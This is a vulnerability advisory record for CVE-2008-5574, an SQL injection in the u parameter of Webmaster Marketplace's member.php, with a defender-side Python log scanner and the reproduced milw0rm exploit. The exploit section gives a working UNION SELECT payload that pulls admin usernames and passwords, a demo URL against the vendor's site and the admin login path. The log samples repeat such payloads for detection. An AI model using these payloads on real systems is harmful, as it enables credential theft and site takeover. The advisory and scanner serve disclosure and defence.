https://www.exploit-db.com/exploits/7407
https://www.securityfocus.com/bid/32756
https://cxsecurity.com/issue/WLB-2008120141
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-259
unscripts UN Webmaster Marketplace 'member.php' SQL Injection Vulnerability






Vulnerability ID | 1116999 | Vulnerability type | SQL injection |
Published | 2008-12-10 | Updated | 2008-12-18 |
CVE-2008-5574 | CNNVD-200812-259 |
Platform | PHP | CVSS score | 7.5 |
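|Vulnerability source
|Vulnerability details
Webmaster Marketplace is a one-stop e-commerce system. member.php in Webmaster Marketplace contains an SQL injection vulnerability. A remote attacker can execute arbitrary SQL commands via the u parameter.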
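A defender-side check for this issue, as an added example that is not part of the original advisory or the product's code: it scans web access logs for member.php requests whose u value is not a plain integer. It assumes u is meant to be a numeric member ID (the page only shows u=15) and that logs use the combined log format; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Dec/2008:10:01:02 +0000] "GET /member.php?u=15 HTTP/1.1" 200 5120
198.51.100.9 - - [10/Dec/2008:10:03:40 +0000] "GET /member.php?u=15+UNION+SELECT+concat(user,0x3e,pass),2+FROM+admin-- HTTP/1.1" 200 733
198.51.100.9 - - [10/Dec/2008:10:03:55 +0000] "GET /MPS/member.php?u=15%20uNiOn%2F%2A%2A%2FSeLeCt%201,2 HTTP/1.1" 200 701
203.0.113.4 - - [10/Dec/2008:10:05:11 +0000] "GET /index.php?u=abc HTTP/1.1" 200 900
203.0.113.4 - - [10/Dec/2008:10:06:00 +0000] "GET /member.php?u=15&u=0+OR+1=1 HTTP/1.1" 200 5120
"""

REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})'
)

def suspicious_member_requests(log_text):
    """Return (client_ip, decoded_u_value) for member.php hits whose u is not a plain integer."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target, _status = m.groups()
        url = urlsplit(target)
        # Match member.php in any install directory, case-insensitively.
        if not url.path.lower().endswith("/member.php"):
            continue
        # parse_qs URL-decodes values and keeps every repeated "u" parameter,
        # so encoded payloads and duplicate-parameter tricks are both inspected.
        values = parse_qs(url.query, keep_blank_values=True).get("u", [])
        for value in values:
            # Assumption: a legitimate member ID is a short run of digits only.
            if not re.fullmatch(r"\d{1,10}", value):
                findings.append((ip, value))
    return findings

if __name__ == "__main__":
    for ip, value in suspicious_member_requests(SAMPLE_LOG):
        print(f"{ip}\tu={value!r}")
```

The same allow-list test (digits only) is what the application itself should enforce on u before the value reaches a query, alongside a parameterized statement.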
|Exploit
Webmaster Marketplace (member.php u) Remote SQL Injection Vulnerability
___________________________________
Author: Hussin X
Home :IQ-SecuriTY > www.IQ-TY.com | TrYaG > www.TrYaG.cc
Mail : darkangel_G85@yahoo.com
___________________________________
script : http://www.unscripts.com/MPS.html
DorK : :(
exploit :
_______
http://www.site.com/member.php?u=15+UNION+SELECT+concat(user,0x3e,pass),2+FROM+admin--
Demo :
_______
http://www.unscripts.com/MPS/member.php?u=15+UNION+SELECT+concat(user,0x3e,pass),2+FROM+admin--
login :
http://www.site.com/Admin/login.php
____________________________( Greetz )_________________________________
|
| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC
|
| My friends : str0ke | DeViL iRaQ | IRAQ_JAGUR | Sakab
|
| FAHD | jiko | IRAQ DiveR | Cyber-Zone | CraCkEr | G4N0K
|_____________________________________________________________________
IM IraQi | IM TrYaGi
# milw0rm.com [2008-12-10]
|Affected products
unscripts UN Webmaster Marketplace 0
|References
Source: BID
Name: 32756
Link: http://www.securityfocus.com/bid/32756
Source: MILW0RM
Name: 7407
Link: http://www.milw0rm.com/exploits/7407
Source: SREASON
Name: 4747
Link: http://securityreason.com/securityalert/4747
Source: SECUNIA
Name: 33096
Link: http://secunia.com/advisories/33096
Source: OSVDB
Name: 50655
Link: http://osvdb.org/50655